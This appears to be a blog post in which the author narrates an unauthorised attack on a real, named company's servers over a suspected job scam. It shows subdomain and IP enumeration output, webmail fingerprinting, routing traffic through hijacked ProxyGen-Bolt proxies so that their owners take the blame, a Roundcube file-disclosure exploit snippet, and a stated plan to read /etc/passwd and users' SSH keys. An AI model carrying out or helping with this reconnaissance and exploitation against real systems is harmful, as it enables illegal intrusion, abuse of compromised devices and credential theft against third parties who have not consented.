I know a guy who lives in the U.S., and he told me that he received a suspicious email from Russians. They offered him a job, but he had to fill out a form that asked for personal details. They said the information would be processed in Russia. Of course, he didn’t give them anything. The thing is, I got interested, so now I have to try to attack their infrastructure because we think they’re scammers.
target: performia.com
Enumeration process
The first thing I do is collect information about the target — as much as POSSIBLE. First of all, I performed a DNS scan to identify subdomains.
1
dnsmap performia.com > dnsmap.output
This outputs discovered DNS records to the dnsmap.output file. After that, I’m going to look for open ports on interesting subdomains.
There is a difference between passive and active enumeration. Passive scanning is when you’re not touching the target directly. For example, querying DNS records wouldn’t be considered active enumeration because we’re not touching the target’s infrastructure directly — the tool just asks DNS servers for records.
Active scanning (enumeration), on the other hand, would be port scanning. After this process is done, I’m going to look for interesting subdomains and perform port scans on them using the nmap tool.
I hope there won’t be any complex CMSs (Content Management Systems) or WAFs (Web Application Firewalls), because I don’t want to mess around with CMS systems that don’t have public exploits available — mostly a waste of time and not worth it. Also, I don’t want them to have a WAF because then I’ll have to be more careful. If I get caught by a WAF, their Blue Team will receive an alert and most likely my IP address will get blocked.
Of course, I can change my IP address any time I want (with free proxies available), but I don’t want to use them.
[+] searching (sub)domains for performia.com using built-in wordlist [+] using maximum random delay of 10 millisecond(s) between requests
au.performia.com IP address #1: 81.29.209.53
beta.performia.com IP address #1: 81.29.209.53
cn.performia.com IP address #1: 113.10.239.94
co.performia.com IP address #1: 81.29.209.53
em.performia.com IP address #1: 3.79.130.38 IP address #2: 46.51.200.92 IP address #3: 54.216.50.79 IP address #4: 18.158.228.216
ftp.performia.com IP address #1: 81.29.209.52
helpdesk.performia.com IP address #1: 204.141.32.74
is.performia.com IP address #1: 81.29.209.53
localhost.performia.com IP address #1: 127.0.0.1 [+] warning: domain might be vulnerable to "same site" scripting (https://seclists.org/bugtraq/2008/Jan/270)
mail.performia.com IP address #1: 81.29.209.52
ru.performia.com IP address #1: 141.105.66.159
server.performia.com IP address #1: 81.29.209.53
staging.performia.com IP address #1: 81.29.209.53
test.performia.com IP address #1: 81.29.209.53
web.performia.com IP address #1: 81.29.209.53
webmail.performia.com IP address #1: 81.29.209.52
wt.performia.com IP address #1: 113.10.239.94
www.performia.com IP address #1: 81.29.209.52
[+] 18 (sub)domains and 21 IP address(es) found [+] completion time: 728 second(s)
There are many interesting subdomains. Also, I have to say they are using many different IP addresses from different IP ranges.
IP range
IP addresses
81.29.209.32/27
81.29.209.53, 81.29.209.52
113.10.239.0/24
113.10.239.94
3.64.0.0/12
3.79.130.38
46.51.192.0/20
46.51.200.92
54.216.0.0/15
54.216.50.79
18.156.0.0/14
18.158.228.216
204.141.32.0/23
204.141.32.74
141.105.66.0/24
141.105.66.159
This table shows everything. Some of the addresses are from Russia, Germany, the U.S., etc. Of course, I’m not going to touch IP addresses that are located in the U.S. and Europe (it depends; sometimes I can touch European networks if they have interesting content).
Let’s start by looking for more information on webmail.performia.com. I can use wig to get more information about their web interface:
1
wig https://webmail.performia.com > wig.output
This will give me information about the web interface, like what CMS is being used, which webserver is hosting the service, which languages are used, and so on.
Most data comes from analyzing files’ content that are received from the server during requests. In some cases, response headers are analyzed too (for example, to find out which webserver is being used or which PHP version is installed on the server — wig will check response headers for that data).
Scanning https://webmail.performia.com... __________________________________________________ SITE INFO ___________________________________________________ IP Title 81.29.209.52 Performia WebMail :: Welcome to Performia WebMail
___________________________________________________ VERSION ____________________________________________________ Name Versions Type Roundcube 1.2-beta CMS phpMyAdmin CMS Apache 2.4.10 | 2.4.11 | 2.4.12 | 2.4.5 | 2.4.6 | 2.4.7 | 2.4.8 Platform 2.4.9 PHP 7.4.33 Platform
__________________________________________________ SUBDOMAINS __________________________________________________ Name Page Title IP https://webmail.performia.com:443 Performia WebMail :: Welcome to Performia WebMail 81.29.209.52 http://webmail.performia.com:80 Performia WebMail :: Welcome to Performia WebMail 81.29.209.52
_________________________________________________ INTERESTING __________________________________________________ URL Note Type /robots.txt robots.txt index Interesting
Alright. Now I know they have Roundcube webmail (service version 1.2-beta) and phpMyAdmin for administrative tasks (managing the SQL DB and related stuff). I suppose they have a MySQL database or MariaDB. I also checked robots.txt but there is nothing interesting there.
Alright. Now I can try several things:
Try to brute-force directories to find more interesting files/directories on the server.
Search for public exploits for Roundcube 1.2-beta — but they have to be RCE, either authenticated or unauthenticated.
Try to find the phpMyAdmin dashboard and look for exploits for that. Maybe an authentication bypass or something.
Before I do any of those, I need to discuss several things:
First of all, I don’t have to brute-force directories/files because I already know the CMS and its version, so I can just Google its file structure or even ask ChatGPT for a faster answer.
If I don’t find any interesting exploits for Roundcube, I’ll have to develop one.
If I don’t find any interesting exploits for phpMyAdmin, I’ll have to create one.
Alright. There are two potential problems. Developing an exploit takes too much time because, first of all, I have to set up a lab with the exact same tech stack and then I need to penetration-test everything. I will have to do a code audit and manual testing (even automatic fuzzing for some quick output). All of this sounds cool and fun, but trust me, most of the time it’s not.
For example, when I was trying to find an exploit for one binary, I left a fuzzing tool running for multiple hours just to get something interesting. That “something” wasn’t even a big deal — it was just a little bit better than other information.
Also, before I touch anything, I’ll have to identify a firewall. I’m not going to use my IP address for that, because most of the tools just try to send malicious payloads like XSS/SQLi/SSRF/LFI/RFI and test if the request gets blocked. I don’t want to get blocked. I want to take over the server. Is that too much to ASK????
Proxies are my friends. There are hackers who exploit routers and other publicly available weak devices and create ProxyGen-Bolt proxies. I can freely use those HTTP proxies to hide my real IP address. This means, if I do this:
I’ll get the index.html file. The output was actually saved to disk:
1 2 3 4 5 6 7 8 9 10 11 12
--2025-11-05 15:07:03-- http://webmail.performia.com/ Connecting to 49.44.254.213:80... connected. Proxy request sent, awaiting response... 301 Moved Permanently Location: https://webmail.performia.com/?absolute_url_processed=1 [following] --2025-11-05 15:07:04-- https://webmail.performia.com/?absolute_url_processed=1 Resolving webmail.performia.com (webmail.performia.com)... 81.29.209.52 Connecting to webmail.performia.com (webmail.performia.com)|81.29.209.52|:443... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: ‘index.html’
index.html [ <=> ] 5.45K --.-KB/s in 0.001s
Alright — now I can use proxychains to create a proxy for the wafw00f tool. This means I will be able to redirect wafw00f‘s traffic through the 49.44.254.213 HTTP proxy, and that IP will get blamed for the malicious action instead of me!!! BoOooOoooOo HaHaHaHaHaaaaaaa.
BTW, I got that IP from Shodan. I know how to find my precious ProxyGen-Bolt proxies!
~ WAFW00F : v2.3.1 ~ The Web Application Firewall Fingerprinting Toolkit
[*] Checking https://webmail.performia.com [proxychains] Strict chain ... 49.44.254.213:80 ... webmail.performia.com:443 <--denied ERROR:wafw00f:Something went wrong HTTPSConnectionPool(host='webmail.performia.com', port=443): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x7f1c58bae900>: Failed to establish a new connection: [Errno 111] Connection refused')) ERROR:wafw00f:Site webmail.performia.com appears to be down
This might mean there is some kind of firewall in front of webmail.performia.com. I downloaded the Roundcube 1.2-beta source code to start fuzzing locally. This will give me a chance to find an exploit that’s worth trying on the real target. The thing is, on exploit-db there is only one exploit for this version. It’s a file disclosure, but I have to be authenticated. If I manage to bypass authentication, I’ll be able to perform file disclosures. Here is the PoC for this exploit:
defmain(): s = requests.Session() r = s.get(URL,params={"_task":"login"},verify=False) token = None for line in r.text.split("\n"): if'name="_token"'in line: token = line.split("value=")[1].split('"')[1] print("[+] token: %s" % token) if token isNone: print("[!] unable to retrieve token") sys.exit(1)
data = { "_token":token, "_task":"login", "_action":"login", "_timezone[files][1][path]":sys.argv[1], "_url":"_task%3Dlogin", "_user":USER, "_pass":PASS } r = s.post(URL,params={"_task":"login"},data=data,verify=False)
Ok. The USER and PASS constants indicate the exploit requires authentication. After I obtain a user and its password, I can read /etc/passwd to obtain users and then try to read SSH keys from users’ home directories. This is going to be the main plan against this target for now.
Problems with Docker
Ok. Honesty is the key to nothing, but this time I’ll be honest about Dockers… I obtained a setup.sh file for roundcube 1.2-beta, but the thing is that when I try to open the web UI in the browser, it resets the connection. Even curl and wget fail:
# --- Dovecot Dockerfile --- mkdir -p dovecot cat > dovecot/Dockerfile <<'EOF' FROM alpine:3.18 RUN apk add --no-cache dovecot openssl
# Create test user & mail dir RUN adduser -D -u 1000 -G mail -h /home/testuser -s /sbin/nologin testuser && \ mkdir -p /var/mail/testuser && chown -R testuser:mail /var/mail /home/testuser
# Wait for MariaDB host="db" port=3306 echo "⏳ Waiting for MariaDB at \$host:\$port..." for i in \$(seq 1 30); do if nc -z "\$host" "\$port" >/dev/null 2>&1; then echo "✅ MariaDB reachable" break fi sleep 1 done
# Import DB schema if empty if [ \$(mysql -h db -u roundcube -proundcube -D roundcube -e "SHOW TABLES;" | wc -l) -eq 0 ]; then echo "⬇️ Importing Roundcube DB schema..." mysql -h db -u roundcube -proundcube roundcube < SQL/mysql.initial.sql fi
# --- Build & run containers --- echo"🚀 Building and starting containers..." docker compose down -v >/dev/null 2>&1 || true docker compose up -d --build
This means there won’t be any fuzzing locally. Things got worse. I have to fuzz a live server that’s probably standing behind some kind of WAF… (To be continued)